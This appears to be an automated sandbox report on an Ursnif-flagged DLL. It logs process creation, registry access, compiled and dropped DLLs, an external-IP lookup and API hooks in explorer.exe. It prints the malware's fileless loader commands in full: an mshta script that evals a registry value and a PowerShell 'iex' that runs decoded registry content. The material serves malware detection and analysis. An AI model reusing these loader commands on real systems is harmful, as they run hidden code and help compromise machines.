Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17432 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17436 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\Audiinrt'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3A14.tmp' 'c:\Users\user\AppData\Local\Temp\40soah3l\CSC95BB5FC1CC074173A3B7FF0DF3A65D4.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B0B.tmp' 'c:\Users\user\AppData\Local\Temp\kpzypqek\CSCCCB2EFB1A41F4F449A32549AFB48267C.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 948
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\E443.bi1'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fd885c499439tar.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82952 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:82966 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17432 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5720 CREDAT:17436 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3A14.tmp' 'c:\Users\user\AppData\Local\Temp\40soah3l\CSC95BB5FC1CC074173A3B7FF0DF3A65D4.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4B0B.tmp' 'c:\Users\user\AppData\Local\Temp\kpzypqek\CSCCCB2EFB1A41F4F449A32549AFB48267C.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\E443.bi1'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.450360033.0000022419D70000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.459689386.0000016299730000.00000002.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.pdb source: powershell.exe, 00000017.00000002.537912981.0000028A03105000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000001E.00000000.497705929.0000000007BA0000.00000002.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000025.00000003.495060225.0000000004EB3000.00000004.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.pdbXP source: powershell.exe, 00000017.00000002.537912981.0000028A03105000.00000004.00000001.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.pdb source: powershell.exe, 00000017.00000002.537912981.0000028A03105000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000025.00000003.497314240.000000000303C000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000025.00000003.497314240.000000000303C000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.473952446.00000000062A0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 0000001E.00000003.513874713.00000000078A0000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.473952446.00000000062A0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 0000001E.00000003.513874713.00000000078A0000.00000004.00000001.sdmp, WerFault.exe, 00000025.00000003.495294633.0000000003030000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: control.exe, 0000001F.00000002.491986987.000002B01878C000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000025.00000003.496380525.0000000003036000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdbGCTL source: control.exe, 0000001F.00000002.491986987.000002B01878C000.00000004.00000040.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.pdbXP source: powershell.exe, 00000017.00000002.538073248.0000028A0317E000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000001E.00000000.497705929.0000000007BA0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000025.00000003.495294633.0000000003030000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.cmdline'

PE file contains sections with non-standard names

Source: 5fd885c499439tar.dll	Static PE information: section name: .applaus
Source: 5fd885c499439tar.dll	Static PE information: section name: .isatic

Registers a DLL

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\5fd885c499439tar.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FAB0CB push ecx; ret		1_2_04FAB0DB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_04FAAD10 push ecx; ret		1_2_04FAAD19

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\kpzypqek\kpzypqek.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\40soah3l\40soah3l.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000001.00000002.532393287.0000000003130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.465679265.0000028A7BBE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346665065.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346762135.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.485625992.00000000027C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.698167834.0000021DB8A36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346591933.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346712408.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.489434106.000001ED55180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.490922654.000001ED55336000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346417089.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.405016881.000000000572C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.696291358.0000021913236000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346784908.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346795149.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.465913433.0000000003160000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.346535972.0000000005928000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.705764448.0000000004E16000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.476423106.000002B016990000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.490298727.0000000000916000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4724, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6712, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3092, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4540, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFD8893521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFD88935200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
